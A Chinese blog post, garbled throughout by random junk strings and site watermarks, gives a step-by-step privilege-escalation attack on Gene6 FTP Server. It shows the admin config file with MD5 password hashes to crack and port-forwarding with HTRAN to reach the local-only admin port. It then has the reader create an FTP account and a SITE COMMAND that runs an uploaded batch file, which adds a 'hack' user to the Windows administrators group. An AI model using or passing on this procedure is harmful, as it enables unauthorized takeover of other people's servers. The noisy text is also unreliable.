空间管理您的位置: IXPUB技术博客 » 妖界之箭欢迎您(CHINA *009) » 日志

Gene6 FTP Server的权限提升

上一篇 / 下一篇 2008-11-27 08:17:05

Gene6 FTP Server这个FTP软件简单易用，比SU的安全性高的多。他的默认管理端口是8021，只允许本机计算机连接。外部计算机即使你得到管理帐号你也不能登陆进去。这一点和我们的SU一样，SU的管理端口是43958。

s ?3Icn!Q0Gene6 FTP Server的帐户配置文件在：C:\Program Files\Gene6 FTP Server\RemoteAdmin\Remote.ini;如果不在请自己手动查找.具体的不再废话.IXPUB技术博客?:M3I`[4R!c

[

u|_W9S `0[Server]
Roq-s0y Oe#c)K$T5k0IP=127.0.0.1,8021\r\n 这个是本地管理IP 和默认管理的端口,端口是可以修改的.
f3eEA S;F^b0GrantAllAccessToLocalHost=0IXPUB技术博客8I'vg#T'M
[Acct=Administrator] 管理帐户
;QO Sm"hN:b_#I0Enabled=1
o8VH Mv"C0Rights=0IXPUB技术博客9F2I-?s%eS*IyW
Password=202CB962AC59075B964B07152D234B70 管理帐户的密码的MD5的加密字符串
s'U7dT%QG(P%MIG)K0[Acct=124] 这个是普通帐号,注意Acct=124这个帐号不是124,而是24;124中的1代表第一个帐号.IXPUB技术博客7@t0s,\(_-X(h;l5w
Enabled=1IXPUB技术博客:j n p.ZX K ~/M~
Password=C8FFE9A587B126F152ED3D89A146B445 MD5的加密字符串,可以去破解出密码的明文.IXPUB技术博客[ u-Wd`
Domain=
"`]^:`Xb(o \+^k0RootFolder=
8k%rlGqn%Y0Rights=0IXPUB技术博客'P9S BP4w(vi
IPAccessList=IXPUB技术博客3f HI-VIJdg

*EM$S1OdqG0 ]IXPUB技术博客Qa;dz.VdHC1M

8U dH-f4^.g0我们得到管理密码后如何才能登陆上去管理呢? 我们可以用HTRAN的端口转发功能,把默认管理端口转发到其他端口,然后进行连接.我们本地事先也安装一个Gene6 FTP Server软件.然后配置.

新建一个远程FTP管理IXPUB技术博客6W8E-K3f1k)uZG,xu

HOST那里输入你要提权的IP

Ys]nF3`0PORT输入你用端口转发工具转发的端口,USERNAME和PASSWORD输入Gene6 FTP Server的帐户配置文件所破解的帐号和密码信息,注意密码是MD5加密过的.必须输入明文的.

#Sd6iwI){|F+l+x0不出意外我们就可以连接上去了.我们可以新建一个普通的帐号.我这里建一个名为 msnhack 密码为manhack的帐号然后选择好管理目录,然后我们在权限配置那里配置好权限.可以全部选上..IXPUB技术博客5f6w [$}(pe&u,?*k/h?

(Z!n_2E{ @yFB0IXPUB技术博客{0__Ho"m%T |8{"a

这样还不能提权.这里到了我们最核心的一步.IXPUB技术博客i)s@ u(?F

1.写一个能执行命令的批处理文件,并上传到目标主机.

@echo off
,G ~JX0D|E+L(e0net user hack hack /add
,Y Ikv!q{)t7R-J8y0Q0net localgroup administrators hack /addIXPUB技术博客{"wEyJ~.W:L

6T c-lG"wB02.然后在SITE COMMANDS那个地方再进行配置.IXPUB技术博客q5lvE&e6Ro3}

/k;e#?yb&V0

COMMAND那输入你的命令执行的名字.我写的是HACK DESCRIPTTION这个是写描述的.这里随便你写什么都可以的. EXECUTE这里输入你的BAT的命令执行文件的路径.也就是你刚上传的那个文件的路径.点OK就可以了.现在我们来看下我们本地的帐号情况.IXPUB技术博客)W/S#m8{'\1eN?

9qxOyf8x0